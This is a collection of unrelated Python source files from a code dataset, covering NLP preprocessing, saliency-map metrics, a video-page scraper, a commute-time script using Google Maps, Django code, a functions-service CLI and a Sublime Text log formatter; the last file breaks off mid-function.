tr = TaskResults(retention_time=1) # Intentionally set short retention time
await tr.add_running_task(task_uid="abc", payload={"some_value": 5})
await tr.add_running_task(task_uid="def", payload={"some_value": 10})
await tr.add_completed_task(task_uid="def", payload={"some_value": 20})
status, payload = await tr.get_task_info(task_uid="abc")
assert status == "running"
assert payload == {"some_value": 5}
status, payload = await tr.get_task_info(task_uid="def")
assert status == "completed"
assert payload == {"some_value": 20}
status, payload = await tr.get_task_info(task_uid="gih")
assert status == "not_found"
assert payload == {}
asyncio.run(testing())
|
StarcoderdataPython
|
4821329
|
<gh_stars>0
import numpy as np
from datasets import load_dataset
from itertools import chain
from gensim.models import KeyedVectors
import pickle
def preprocess_conll_data(dataset, embedding_model, dimensions):
"""
Takes the CoNLL dataset, an embedding model and the dimensionality
of its embeddings as input, extracts the tokens and target pos tags
as lists and returns the tokens as word embeddings and the pos tags
"""
# make one list from the extracted list of lists of tokens in the dataset
tokens = list(chain.from_iterable(dataset['tokens']))
# make one list from extracted the list of lists of pos tags in the dataset
pos_tags = list(chain.from_iterable(dataset['pos_tags']))
# transform tokens to embeddings
inputs_list = []
# iterate over every token
for token in tokens:
# get embedding from pretrained model
if token in embedding_model:
vector = embedding_model[token]
# get zero-filled vector if token not in model
else:
vector = [0]*dimensions
inputs_list.append(vector)
return inputs_list, pos_tags
def create_output_values(targets, output_nodes, activation_function):
"""
Takes a list of target labels and transforms them in a list with
the length of the specified number of output nodes and transforms
the values into a range that corresponds to the given activation function.
For the sigmoid function this is a value between 0 and 1 and
for a hyperbolic tangent function this is a value between -1 and 1.
The index corresponding to the target label is assigned the highest value.
"""
targets_output_list = []
# iterate over targets
for target in targets:
if activation_function == 'sigmoid':
# create an array filled with 0.01's
target_value = np.zeros(output_nodes) + 0.01
elif activation_function == 'tanh':
# create an array filled with -0.99's
target_value = np.zeros(output_nodes) - 0.99
# tag label is the index of the array that is set to 0.99
target_value[target] = 0.99
targets_output_list.append(target_value)
return targets_output_list
def main():
output_nodes = 12
# PREPROCESS TRAINING DATA
# load embedding model trained on COW corpus, SOURCE: https://github.com/clips/dutchembeddings
embedding_model = KeyedVectors.load_word2vec_format("data/cow-embeddings-320/cow-big.txt", binary=False)
# load the Dutch training CoNLL-2002 dataset
train_dataset = load_dataset("conll2002", "nl", split='train')
# get list of input tokens as embeddings and list of target labels
inputs_list, targets_list = preprocess_conll_data(train_dataset, embedding_model, 320)
# save the inputs list as txt-file
pickle.dump(inputs_list, open('./data/conll2002/train_inputs.txt', 'wb'))
# create output values for sigmoid as activation function
targets_output_list = create_output_values(targets_list, output_nodes, 'sigmoid')
# save the list with output values as txt-file
pickle.dump(targets_output_list, open('./data/conll2002/train_targets_output.txt', 'wb'))
# create output values for tanh as activation function
targets_output_list = create_output_values(targets_list, output_nodes, 'tanh')
# save the list with output values as txt-file
pickle.dump(targets_output_list, open('./data/conll2002/train_targets_tanh_output.txt', 'wb'))
# PREPROCESS VALIDATION DATA
# load the Dutch validation CoNLL-2002 dataset
validation_dataset = load_dataset("conll2002", "nl", split='validation')
# get list of input tokens as embeddings and list of target labels
inputs_list, targets_list = preprocess_conll_data(validation_dataset, embedding_model, 320)
# save the inputs list and targets list as txt-files
pickle.dump(inputs_list, open('./data/conll2002/validation_inputs.txt', 'wb'))
pickle.dump(targets_list, open('./data/conll2002/validation_targets.txt', 'wb'))
# PREPROCESS TEST DATA
# load the Dutch test CoNLL-2002 dataset
test_dataset = load_dataset("conll2002", "nl", split='test')
# get list of input tokens as embeddings and list of target labels
inputs_list, targets_list = preprocess_conll_data(test_dataset, embedding_model, 320)
# save the inputs list and targets list as txt-files
pickle.dump(inputs_list, open('./data/conll2002/test_inputs.txt', 'wb'))
pickle.dump(targets_list, open('./data/conll2002/test_targets.txt', 'wb'))
if __name__ == "__main__":
main()
|
StarcoderdataPython
|
28777
|
from itertools import product
from tools.general import load_input_list
def get_new_active_range(current_active_set, dimensions):
lowest = [0] * dimensions
highest = [0] * dimensions
for point in current_active_set:
for i, coord in enumerate(point):
if coord < lowest[i]:
lowest[i] = coord
elif highest[i] < coord:
highest[i] = coord
return tuple(range(lowest[i] - 1, highest[i] + 2) for i in range(dimensions))
def count_active_neighbours(active_set, point):
active_count = 0
for nbr in product(*(range(coord - 1, coord + 2) for coord in point)):
if nbr in active_set and nbr != point:
active_count += 1
return active_count
def new_state_is_active(active_set, point):
active_nbr = count_active_neighbours(active_set, point)
if point in active_set:
if 2 <= active_nbr <= 3:
return True
elif active_nbr == 3:
return True
return False
def iterate_grid(initial_grid, dimensions, iterations):
active_points = set()
for y, row in enumerate(initial_grid):
for x, cube in enumerate(row):
if cube == '#':
active_points.add(tuple([x, y] + [0] * (dimensions - 2)))
for _ in range(iterations):
new_active_points = set()
for point in product(*get_new_active_range(active_points, dimensions)):
if new_state_is_active(active_points, point):
new_active_points.add(point)
active_points = new_active_points
return len(active_points)
starting_grid = [list(row) for row in load_input_list("day17.txt")]
print(f"Part 1 => {iterate_grid(starting_grid, 3, 6)}")
print(f"Part 1 => {iterate_grid(starting_grid, 4, 6)}")
|
StarcoderdataPython
|
155610
|
<reponame>rajeevyasarla/3SD<filename>compute_and_plot.py
import os
import torch
from sklearn.metrics import f1_score, precision_score, recall_score
'''from sklearn.metrics import (precision_recall_curve, PrecisionRecallDisplay)
from sklearn.metrics import precision_recall_curve'''
import cv2
import pdb
import numpy as np
import torch.nn.functional as F
from torch.autograd import Variable
import matplotlib.pyplot as plt
import matplotlib as mpl
import glob
def Sobel_op(img):
kernel_x = np.array([[1,0,-1],[2,0,-2],[1,0,-1]])
kernel_x_tensor = torch.Tensor(np.expand_dims(np.expand_dims(kernel_x, 0), 0)) # size: (1, 1, 11,11)
kernel_x_tensor = Variable(kernel_x_tensor.type(torch.FloatTensor), requires_grad=False)
kernel_y = np.array([[1, 2, 1], [0, 0, 0], [-1, -2, -1]])
kernel_y_tensor = torch.Tensor(np.expand_dims(np.expand_dims(kernel_y, 0), 0)) # size: (1, 1, 11,11)
kernel_y_tensor = Variable(kernel_y_tensor.type(torch.FloatTensor), requires_grad=False)
Gx = torch.nn.functional.conv2d(img, kernel_x_tensor, padding=(1, 1))
Gy = torch.nn.functional.conv2d(img, kernel_y_tensor, padding=(1, 1))
G = torch.sqrt(Gx*Gx + Gy*Gy)
G = F.tanh(G)
kernel = np.ones((3, 3)) / 9.0
kernel_tensor = torch.Tensor(np.expand_dims(np.expand_dims(kernel, 0), 0)) # size: (1, 1, 11,11)
kernel_tensor = Variable(kernel_tensor.type(torch.FloatTensor), requires_grad=False)
dilated_G = torch.clamp(torch.nn.functional.conv2d(G, kernel_tensor, padding=(1,1)), 0, 1)
return dilated_G
def B_measure(gt,target):
h, w = gt.shape
gt = gt.astype(np.float32)
target = target.astype(np.float32)
gt = torch.from_numpy(gt)
target = torch.from_numpy(target)
G_gt = Sobel_op(gt.view(1,1,h,w))
G_target = Sobel_op(target.view(1, 1, h, w))
B = 1 - (2*(torch.sum(G_gt*G_target))/(torch.sum(G_target*G_target)+torch.sum(G_gt*G_gt)))
return B
def E_measure(gt,target):
gt=gt
target=target
#pdb.set_trace()
phi_gt = np.subtract(gt, gt.mean())
phi_target = np.subtract(target, target.mean())
numerator = 2*phi_gt*phi_target
deno = phi_gt*phi_gt + phi_target*phi_target
phi = numerator/deno
Enhance_phi = 0.25*(1+phi)**2
Em = Enhance_phi.mean()
return Em
def files(path):
for file in os.listdir(path):
if os.path.isfile(os.path.join(path,file)):
yield file
def object_s(pred, gt):
temp = pred[gt == 1]
x = temp.mean()
sigma_x = temp.std()
score = 2.0 * x / (x * x + 1.0 + sigma_x + 1e-20)
return score
def S_object(pred, gt):
fg = torch.where(gt == 0, torch.zeros_like(pred), pred)
bg = torch.where(gt == 1, torch.zeros_like(pred), 1 - pred)
o_fg = object_s(fg, gt)
o_bg = object_s(bg, 1 - gt)
u = gt.mean()
Q = u * o_fg + (1 - u) * o_bg
return Q
def centroid( gt):
rows, cols = gt.size()[-2:]
gt = gt.view(rows, cols)
cuda = False
if gt.sum() == 0:
if cuda:
X = torch.eye(1).cuda() * round(cols / 2)
Y = torch.eye(1).cuda() * round(rows / 2)
else:
X = torch.eye(1) * round(cols / 2)
Y = torch.eye(1) * round(rows / 2)
else:
total = gt.sum()
if cuda:
i = torch.from_numpy(np.arange(0, cols)).cuda().float()
j = torch.from_numpy(np.arange(0, rows)).cuda().float()
else:
i = torch.from_numpy(np.arange(0, cols)).float()
j = torch.from_numpy(np.arange(0, rows)).float()
X = torch.round((gt.sum(dim=0) * i).sum() / total + 1e-20)
Y = torch.round((gt.sum(dim=1) * j).sum() / total + 1e-20)
return X.long(), Y.long()
def divideGT( gt, X, Y):
h, w = gt.size()[-2:]
area = h * w
gt = gt.view(h, w)
LT = gt[:Y, :X]
RT = gt[:Y, X:w]
LB = gt[Y:h, :X]
RB = gt[Y:h, X:w]
X = X.float()
Y = Y.float()
w1 = X * Y / area
w2 = (w - X) * Y / area
w3 = X * (h - Y) / area
w4 = 1 - w1 - w2 - w3
return LT, RT, LB, RB, w1, w2, w3, w4
def dividePrediction( pred, X, Y):
h, w = pred.size()[-2:]
pred = pred.view(h, w)
LT = pred[:Y, :X]
RT = pred[:Y, X:w]
LB = pred[Y:h, :X]
RB = pred[Y:h, X:w]
return LT, RT, LB, RB
def ssim( pred, gt):
gt = gt.float()
h, w = pred.size()[-2:]
N = h * w
x = pred.mean()
y = gt.mean()
sigma_x2 = ((pred - x) * (pred - x)).sum() / (N - 1 + 1e-20)
sigma_y2 = ((gt - y) * (gt - y)).sum() / (N - 1 + 1e-20)
sigma_xy = ((pred - x) * (gt - y)).sum() / (N - 1 + 1e-20)
aplha = 4 * x * y * sigma_xy
beta = (x * x + y * y) * (sigma_x2 + sigma_y2)
if aplha != 0:
Q = aplha / (beta + 1e-20)
elif aplha == 0 and beta == 0:
Q = 1.0
else:
Q = 0
return Q
def S_region(pred, gt):
X, Y = centroid(gt)
gt1, gt2, gt3, gt4, w1, w2, w3, w4 = divideGT(gt, X, Y)
p1, p2, p3, p4 = dividePrediction(pred, X, Y)
Q1 = ssim(p1, gt1)
Q2 = ssim(p2, gt2)
Q3 = ssim(p3, gt3)
Q4 = ssim(p4, gt4)
Q = w1 * Q1 + w2 * Q2 + w3 * Q3 + w4 * Q4
return Q
def S_measure(target,gt):
alpha = 0.5
h, w = gt.shape
gt = torch.from_numpy(gt).type(torch.FloatTensor)
target = torch.from_numpy(target).type(torch.FloatTensor)
gt = gt.view(1,1,h,w)
target = target.view(1,1,h,w)
Q = alpha * S_object(target, gt) + (1 - alpha) * S_region(target, gt)
return Q
gt_path = './testing/gt/'
target_path = './testing/output_u2net_results/'
test_datasets = ['DUTS']
output_dir = './plots/'
Num_th = 20
Threshold = 0.5
Flag_figs = 0
for dataset in test_datasets:
name = 'exp' + '_' + dataset
precision_list = np.zeros((Num_th, 1))
recall_list = np.zeros((Num_th, 1))
F_score = np.zeros((Num_th, 1))
f1_score_list = []
MAE_list = []
Emeasure_list = []
Bmeasure_list = []
Smeasure_list = []
count = 0
print("----------------------------------------------------------------------------------------")
img_name_list = list(glob.glob(gt_path + dataset + '/*' + '.jpg')) + list(glob.glob(gt_path + dataset + '/*' + '.png'))
print("{} dataset starting, Total image : {} ".format(name,len(img_name_list)))
for file in files(gt_path + dataset):
gt_name = os.path.join(gt_path,dataset,file)
target_name = os.path.join(target_path,dataset,file)
# pdb.set_trace()
# print(target_name)#,precision_list,recall_list)
Gt = cv2.imread(gt_name,0)
pred = cv2.imread(target_name,0)
h, w = Gt.shape
# print(w,h,pred.shape)
pred = cv2.resize(pred,(w,h))
Gt = Gt.astype(np.float32)
pred = pred.astype(np.float32)
Bmeasure_list.append(B_measure(Gt, pred))
gt = np.zeros(Gt.shape)
target = np.zeros(pred.shape)
gt[Gt<Threshold] = 0
gt[Gt>=Threshold] = 1
target[pred<Threshold] = 0
target[pred>=Threshold] = 1
Emeasure_list.append(E_measure(gt, target))
MAE_list.append(np.absolute(np.subtract(gt, target)).mean())
Smeasure_list.append(S_measure(target, gt))
f1_score_list.append(f1_score(gt.reshape(h*w),target.reshape(h*w),labels='binary'))
if Flag_figs == 1:
t_count = 0
for th in np.linspace(0.001, 0.99, Num_th):
gt = np.zeros(Gt.shape)
target = np.zeros(pred.shape)
gt[Gt < th] = 0
gt[Gt >= th] = 1
target[pred < th] = 0
target[pred >= th] = 1
precision_list[t_count] += precision_score(gt.reshape(h*w),target.reshape(h*w))
recall_list[t_count] += recall_score(gt.reshape(h*w),target.reshape(h*w))
#F_score[t_count] += f1_score(gt.reshape(h*w),target.reshape(h*w),labels='binary')
t_count +=1
count +=1
if count%500==0:
print(count)
# print("{} : F1_score : {} gtsum : {} pred sum : {} ".format(file,f1_score_list[-1],gt.sum(),target.sum()))
# pdb.set_trace()
precision_list = precision_list/count
recall_list = recall_list/count
F_score = F_score/count
MAE = sum(MAE_list)/len(MAE_list)
F_mu = sum(f1_score_list)/len(f1_score_list)
E_mu = sum(Emeasure_list)/len(Emeasure_list)
B_mu = sum(Bmeasure_list)/len(Bmeasure_list)
S_mu = sum(Smeasure_list) / len(Smeasure_list)
np.savez('%s/%s.npz' % (output_dir, name), precision_list=precision_list, recall_list=recall_list, F_score=F_score, MAE=MAE, F_mu=F_mu, E_mu=E_mu, B_mu=B_mu, S_mu=S_mu)
print("Dataset:{} Mean F1_Score : {}".format(dataset,F_mu))
print("Dataset:{} Mean MAE : {}".format(dataset,MAE))
print("Dataset:{} Mean E_measure : {}".format(dataset,E_mu))
print("Dataset:{} Mean B_measure : {}".format(dataset,B_mu))
print("Dataset:{} Mean S_measure : {}".format(dataset, S_mu))
print("{} dataset done".format(dataset))
print("----------------------------------------------------------------------------------------")
#print("Mean precision_Score : {}".format(sum(precision_list)/len(precision_list)))
#print("Mean recall_Score : {}".format(sum(recall_list)/len(recall_list)))
#pr_display = PrecisionRecallDisplay(precision=precision_list, recall=recall_list).plot()
#mpl.use('tkagg')
plt.plot(recall_list,precision_list)
plt.savefig(output_dir + name+'_'+'Precision_recall.png')
plt.clf()
plt.plot(np.linspace(0, 255, Num_th), F_score)
plt.savefig(output_dir + name+'_'+'Fscore.png')
plt.clf()
|
StarcoderdataPython
|
56963
|
import json
import re
import requests
from lxml import etree
def get(url: str) -> dict:
"""
title、imgs、videos
"""
data = {}
headers = {
"User-Agent": "Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25",
"Cookie": "did=web_68e0268146694843a92700d2de49a0a6;"
}
# rewrite the desktop url
temp = re.findall(r'live\.kuaishou\.com/u/\w+/(\w+)', url)
if temp:
url = 'https://c.kuaishou.com/fw/photo/{}'.format(temp[0])
rep = requests.get(url, headers=headers, timeout=10)
if rep.status_code == 200:
tree = etree.HTML(rep.text) # pylint: disable=c-extension-no-member
# title
desc = tree.xpath(r"//meta[@name='description']/@content")
if desc:
data['title'] = desc[0]
# imgs
imgs = tree.xpath(r"//img[@class='play-long-image']/@src")
if imgs:
data['imgs'] = ["https:" + i for i in imgs]
# videos
hide_data = tree.xpath(r"//div[@id='hide-pagedata']/@data-pagedata")
if hide_data:
try:
data_ = json.loads(hide_data[0])
data['videos'] = [data_['video']['srcNoMark']]
data['title'] = data['videoName'] = data_['video']['caption']
except Exception:
pass
return data
return {'msg': 'failed...'}
if __name__ == "__main__":
from pprint import pprint
pprint(get(input("url: ")))
|
StarcoderdataPython
|
1676052
|
from datetime import datetime
import pandas as pd
import googlemaps
def get_data_from_google_api(work, csv1_path):
"""
##################################################################
### This code generates public transportation to a location
### using Google's Directions API.
### _________________________________________________________
### INPUT: Redfin Raw Source Data
### Google API (string)
### Location (string)
### OUTPUT: Saved File
###################################################################
"""
# Read in RedFin data
prop_df = pd.read_csv(csv1_path)
n = prop_df.shape[0]
# Initialize Google API
csvK_path = "delete/input.txt"
file = open(csvK_path, "r")
API = file.read()
file.close()
gmaps = googlemaps.Client(key=API) # Up to 40,000 calls per month
now = datetime.now()
aTime = now.replace(hour=8, minute=30)
# Add commute features
for i in range(0, n):
print("Percentage Complete: " + str(round((i+1)/n*100, 2)) + "%")
home = prop_df['ADDRESS'][i] + " " + prop_df['CITY'][i]
directions_result = gmaps.directions(
home,
work,
mode="transit",
arrival_time=aTime
)
if len(directions_result) != 0:
# Number of Transfers (Steps)
steps = len(directions_result[0]['legs'][0]['steps'])
# Record the number of commute steps
prop_df.at[i, 'COMMUTE_NUM_STEPS'] = steps
total_time = directions_result[0]['legs'][0]['duration']['text']
# Record the total commute time to work, arriving at 8:30AM
prop_df.at[i, 'COMMUTE'] = total_time
# Print All Steps
STEPS = []
walk_time = 0
for step in range(steps):
_temp = directions_result[0]['legs'][0]['steps'][step]
if _temp['travel_mode'] == "WALKING":
STEPS.append(str(_temp['travel_mode']).upper() + "(" + str(_temp['duration']['text']).upper() + ")")
walk_time += int(directions_result[0]['legs'][0]['steps'][step]['duration']['text'].split(" ")[0])
elif _temp['travel_mode'] == "TRANSIT":
try:
_temp1 = _temp['transit_details']['line']['vehicle']['type']
_temp2 = _temp['transit_details']['line']['short_name']
_temp3 = str(_temp1) + str(_temp2)
except:
_temp3 = _temp['transit_details']['line']['name']
STEPS.append(str(_temp3).upper() + "(" + str(_temp['duration']['text']) + ")")
# Record all commute steps in a string
prop_df.at[i, 'COMMUTE_STEPS'] = ', '.join(STEPS)
# Record total walking time
prop_df.at[i, 'WALKING_TIME'] = walk_time
# Write the new cleaned dataset to directory
output_file_path = "output/commute_data.csv"
prop_df.to_csv(output_file_path, index=False)
if __name__ == '__main__':
# Work Address
work = "111 E Pearson St, Chicago, IL"
# Read data from CSV files
csv1_path = "data_sets/RedFin_raw_data.csv"
get_data_from_google_api(work, csv1_path)
|
StarcoderdataPython
|
107384
|
# Dummy models.py file to allow for tests to run
from django.db import models
class CCTestModel(models.Model):
name = models.CharField(max_length=10)
age = models.IntegerField()
gender = models.CharField(max_length=10)
price = models.PositiveIntegerField()
discount = models.PositiveIntegerField()
mfg_date = models.DateField()
class Meta:
constraints = ()
|
StarcoderdataPython
|
3204370
|
from requests.models import Response
from uuid import UUID
class Experiment(object):
# TODO: fill in from experiment create non-optional members
def __init__(self):
pass
def create_project(name: str) -> Response:
"""Create a project in the Vision API
Args:
name (str): the project to maybe create
"""
pass
def fetch_project(project_id: UUID) -> Response:
"""Fetch an existing project from the Vision API
Args:
project_id (Option[UUID]): the id of the project to fetch
"""
pass
def create_experiment_for_project(experiment: Experiment, project_id: UUID) -> Response:
"""Create an experiment for an existing project
Args:
experiment (Experiment): the experiment json to use in the request body
project_id (UUID): the id of the project to create this experiment in
"""
pass
|
StarcoderdataPython
|
1611979
|
import logging
import json
from io import StringIO
from cliff.command import Command
from cliff.lister import Lister
from cliff.show import ShowOne
from prataiclient import utils
urllib3_logger = logging.getLogger('requests')
urllib3_logger.setLevel(logging.CRITICAL)
logging = logging.getLogger(__name__)
class FunctionShow(ShowOne):
"""Show information about a function"""
def get_parser(self, prog_name):
parser = super(FunctionShow, self).get_parser(prog_name)
parser.add_argument(dest='function_id',
help='id of the function')
return parser
def take_action(self, parsed_args):
function = self.app.client.functions.get(parsed_args.function_id)
column = (
'function_id',
'user_id',
'tenant_id',
'name',
'endpoint',
'description',
'type',
'event',
'runtime',
'memory',
'logs_endpoint'
)
log_endpoint = '{0}/logs'.format(function.get('endpoint', ''))
data = (
function.get('function_id', None),
function.get('user_id', None),
function.get('tenant_id', None),
function.get('name', None),
function.get('endpoint', None),
function.get('description', None),
function.get('type', None),
function.get('event', None),
function.get('runtime', None),
function.get('memory', None),
log_endpoint
)
return column, data
class FunctionCreate(Command):
"""Create a function from a file"""
def get_parser(self, prog_name):
parser = super(FunctionCreate, self).get_parser(prog_name)
parser.add_argument(dest='name',
help='name of the function')
parser.add_argument('--description',
dest='description',
default='',
help='Description of the function')
parser.add_argument('--zip',
dest='zip',
required=True,
help='Path to zip file with the function '
'and requirements are stored.')
parser.add_argument('--memory',
dest='memory',
default=128,
help='How much memory this function will '
'have available, default 128, '
'min value = 64, max value = 8192')
parser.add_argument('--type',
dest='type',
default='async',
choices=['async', 'wait_for_response'],
help='async will execute the function in the '
'background, wait_for_response will block '
'the execution until a response is given.')
parser.add_argument('--runtime',
dest='runtime',
default='python27',
help='Define language runtime')
parser.add_argument('--event',
dest='event',
default='webhook',
help='Define an event for the function to '
'subscribe to')
return parser
def take_action(self, parsed_args):
metadata = {}
metadata['name'] = parsed_args.name
metadata['description'] = parsed_args.description or ''
metadata['event'] = parsed_args.event or 'webhook'
metadata['runtime'] = parsed_args.runtime or 'python27'
metadata['type'] = parsed_args.type or 'async'
metadata['memory'] = parsed_args.memory or 128
meta = json.dumps(metadata)
fd_meta = StringIO(meta)
files = {
"zip_file": open(parsed_args.zip),
"metadata": fd_meta
}
response = self.app.client.functions.create(files)
logging.info(response)
class FunctionList(Lister):
"""List all functions"""
def get_parser(self, prog_name):
parser = super(FunctionList, self).get_parser(prog_name)
parser.add_argument(
'--only-id',
dest='only_id',
default=False,
action='store_true',
help='Display only the Ids',
)
return parser
def take_action(self, parsed_args):
functions = self.app.client.functions.list()
if parsed_args.only_id:
return (('Function ID',),
((function.get('function_id'),) for function in functions))
else:
return (('Function ID', 'Name', 'Endpoint', 'Description',
'Memory', 'Runtime'),
((function.get('function_id'),
function.get('name'),
function.get('endpoint'),
function.get('description'),
function.get('memory'),
function.get('runtime'),
) for function in functions))
class FunctionDelete(Command):
"""Delete a function"""
def get_parser(self, prog_name):
parser = super(FunctionDelete, self).get_parser(prog_name)
parser.add_argument(dest='function_id',
help='id of the function')
return parser
def take_action(self, parsed_args):
self.app.client.functions.delete(parsed_args.function_id)
class FunctionExecute(Command):
"""Execute a function"""
def get_parser(self, prog_name):
parser = super(FunctionExecute, self).get_parser(prog_name)
parser.add_argument(dest='function_id',
help='id of the function')
parser.add_argument('--file',
dest='file',
required=True,
help='Path to json file with the payload')
return parser
def take_action(self, parsed_args):
payload = utils.doc_from_json_file(parsed_args.file)
e = self.app.client.functions.execute(parsed_args.function_id, payload)
logging.info(e)
class FunctionRunningList(Lister):
"""List running functions"""
def get_parser(self, prog_name):
parser = super(FunctionRunningList, self).get_parser(prog_name)
parser.add_argument(
'--only-id',
dest='only_id',
default=False,
action='store_true',
help='Display only the Ids',
)
return parser
def take_action(self, parsed_args):
functions = self.app.client.functions.running_list()
# TODO(m3m0): Show request_id
if parsed_args.only_id:
return (('Run ID',),
((function.get('run_id'),) for function in functions))
else:
return (('Function ID', 'Run ID', 'Name', 'Time running',
'Memory', 'Runtime'),
((function.get('function_id'),
function.get('name'),
function.get('endpoint'),
function.get('description'),
function.get('memory'),
function.get('runtime'),
) for function in functions))
|
StarcoderdataPython
|
4818713
|
# Generated by Django 2.2.4 on 2019-08-12 12:51
import uuid
import django.core.validators
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = []
operations = [
migrations.CreateModel(
name="Database",
fields=[
("created_date", models.DateTimeField(auto_now_add=True)),
("modified_date", models.DateTimeField(auto_now=True)),
(
"id",
models.UUIDField(
default=uuid.uuid4,
editable=False,
primary_key=True,
serialize=False,
),
),
(
"memorable_name",
models.CharField(
help_text="Must match the set of environment variables starting with DATA_DB__[memorable_name]__",
max_length=128,
unique=True,
validators=[django.core.validators.RegexValidator(regex="[A-Za-z0-9_]")],
),
),
(
"is_public",
models.BooleanField(
default=False,
help_text=(
"If public, the same credentials for the database will be shared with each user. "
"If not public, each user must be explicilty given access, "
"and temporary credentials will be created for each."
),
),
),
],
options={"db_table": "app_database"},
)
]
|
StarcoderdataPython
|
169740
|
<filename>proj/manageapp/apps.py<gh_stars>0
import django.apps
class AppConfig(django.apps.AppConfig):
name = "proj.manageapp"
lavel = "manageapp"
|
StarcoderdataPython
|
53578
|
from django.shortcuts import render
from django.views.generic import CreateView
from django.urls import reverse_lazy
from dal import autocomplete
# from .models import Country, Person
# from .forms import PersonForm
from .models import Country
from .forms import CountryForm
# Create your views here.
# class PersonCreateView(CreateView):
# model = Person
# form_class = PersonForm
# template_name = 'person_form.html'
# view_name = 'create-person'
# success_url = reverse_lazy(view_name)
# Create your views here.
class CountryCreateView(CreateView):
model = Country
form_class = CountryForm
template_name = 'person_form.html'
view_name = 'create-country'
success_url = reverse_lazy(view_name)
class CountryAutocompleteView(autocomplete.Select2QuerySetView):
def get_queryset(self):
# model = Country
# paginate_by = 50
# ordering = ['name']
# if self.request.user.is_authenticated:
# return Country.objects.none()
qs = Country.objects.all()
# country = self.forwarded.get('country', None)
if self.q:
qs = qs.filter(name__icontains=self.q)
# qs = qs.filter(name__icontains=self.q)
return qs
def get_create_option(self, context, q):
"""Form the correct create_option to append to results."""
create_option = []
display_create_option = False
if self.create_field and q:
page_obj = context.get('page_obj', None)
if page_obj is None or page_obj.number == 1:
display_create_option = True
# Don't offer to create a new option if a
# case-insensitive) identical one already exists
existing_options = (self.get_result_label(result).lower()
for result in context['object_list'])
if q.lower() in existing_options:
display_create_option = False
print("RANNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN")
if display_create_option and self.has_add_permission(self.request):
create_option = [{
'id': q,
'text': ('"%(new_value)s"') % {'new_value': q},
'create_id': True,
}]
print("create_optionNNNNNNNN :", create_option)
return create_option
def has_add_permission(self, request):
print("ORRRRRRRRRRRRRRRRRRRRRRRR")
return True
|
StarcoderdataPython
|
1652126
|
<filename>format_apex_log.py
import sublime, sublime_plugin
class FormatApexLogCommand(sublime_plugin.TextCommand):
def run(self, edit):
self.format(edit)
self.foldAllTags()
self.highlightDebugs()
def format(self, edit):
# get all contents of view as a list of lines
view = self.view
wholeViewRegion = sublime.Region(0, view.size())
lines = self.view.lines(wholeViewRegion)
formattedString = ''
for line in lines:
# format the contents
contents = '\n' + view.substr(line) + '\n'
if 'USER_DEBUG' in contents or 'FATAL_ERROR' in contents:
formattedString += self.formatLine(contents)
elif 'SYSTEM_MODE_' not in contents:
# don't include System mode in formatted contents
formattedString += contents
# replace contents with the formatted contents
view.replace(edit, wholeViewRegion, '\n' + formattedString)
def formatLine(self, contents):
numTabs = 0
tab = ' ' * 4
formattedString = ''
contentsSplit = contents.split('|DEBUG|')
if (len(contentsSplit) != 2):
contentsSplit = contents.split('|FATAL_ERROR|')
if (len(contentsSplit) != 2):
return contents
else:
formattedString += contentsSplit[0]
contents = contentsSplit[1]
skipNext = False
for index, char in enumerate(contents):
if skipNext:
skipNext = False
continue
previousChar, nextChar = None, None
if index > 0:
previousChar = contents[index - 1]
if index < (index - 1):
nextChar = contents[index + 1]
if char == '(' and nextChar == ')':
formattedString += '()'
skipNext = True
continue
if char in ['{', '}', ']', '[', '(', ')']:
if char in ['}', ')', ']']:
numTabs -= 1
formattedString += '\n' + (tab * numTabs) + char
if char in ['{', '(', '[']:
numTabs += 1
formattedString += '\n' + (tab * numTabs)
elif char == ',' and numTabs > 0:
formattedString += ',\n' + (tab * numTabs)
else:
formattedString += char
return formattedString
def foldAllTags(self):
view = self.view
self.foldTag('CUMULATIVE_LIMIT_USAGE', 'CUMULATIVE_LIMIT_USAGE_END')
self.foldTag('SOQL_EXECUTE_BEGIN', 'SOQL_EXECUTE_END')
self.foldTag('\|CODE_UNIT_STARTED\|\[EXTERNAL\]\|Validation', '\|CODE_UNIT_FINISHED\|Validation')
self.foldTag('SELECT', 'FROM')
def foldTag(self, startTag, endTag):
# get the all regions starting with start tag
regions = self.view.find_all('(?s)' + startTag + '.*?' + endTag)
# for each region, fold content between tags
for region in regions:
regionBetweenTags = sublime.Region(
region.begin() + len(startTag),
region.end() - len(endTag))
self.view.fold(regionBetweenTags)
def highlightDebugs(self):
regions = self.view.find_all('USER_DEBUG')
self.view.add_regions("WordHighlight", regions, "comment", 'dot')
|
StarcoderdataPython
|
164027
|
<filename>apps/cc_cms/admin.py
from django_summernote.admin import SummernoteModelAdmin
from .models import Page, ColumnsSection, Content, DynamicText
class PageAdmin(SummernoteModelAdmin):
summernote_fields = '__all__'
def register_cms(admin_site):
admin_site.register(Page, PageAdmin)
admin_site.register(ColumnsSection, PageAdmin)
admin_site.register(Content, PageAdmin)
admin_site.register(DynamicText, PageAdmin)
|
StarcoderdataPython
|
3376566
|
<filename>plot_dm.py
import matplotlib.pyplot as plt
import numpy as np
import sys
sys.path.append( './pkg' )
import pymod_dm
time = np.loadtxt("res/time.dat")
data = np.loadtxt("res/dm_0.dat")
field = np.loadtxt("res/ef_0.dat")
t = np.loadtxt("res/time.dat")
n_lvl = 3
idx = ['Rr1n1', 'Rr2n2']
dm = pymod_dm.assignDmElement( n_lvl, data )
fig = plt.figure()
ax = fig.add_subplot(1, 1, 1)
handle = []
for i in idx:
handle.append( ax.plot( time, dm[i], marker='.' )[0] )
# field_max = np.abs( np.amax( field[:,2] ) )
# ax.plot( time, field[:,2]/field_max-1.0, ".-")
plt.legend( handle, idx, shadow=True, loc='upper left' )
plt.xlabel('Time (fs)')
plt.ylabel('Density matrix element(s)')
plt.title('Evolution of density matrix')
#ax.set_xlim([-400,800])
ax.grid(True)
plt.savefig("fig/dm.png")
plt.show()
|
StarcoderdataPython
|
1610606
|
<filename>example/task.py
from bixi.app import App
app = App(node_id='task')
@app.task
async def task_test():
print('task_test')
|
StarcoderdataPython
|
4830865
|
#!/usr/local/bin/python3
#
# roster-checker.py
# cs1570-grader
#
# Created by <NAME> on 05/14/17.
# Copyright 2017. <NAME>. All rights reserved.
#
import sys
import csv
import os
from pprint import pprint
def printError(error):
sys.stdout = sys.stderr
print(error)
sys.exit(1)
def parseRosterFile(filename):
students = []
with open(filename, 'rt') as csvfile:
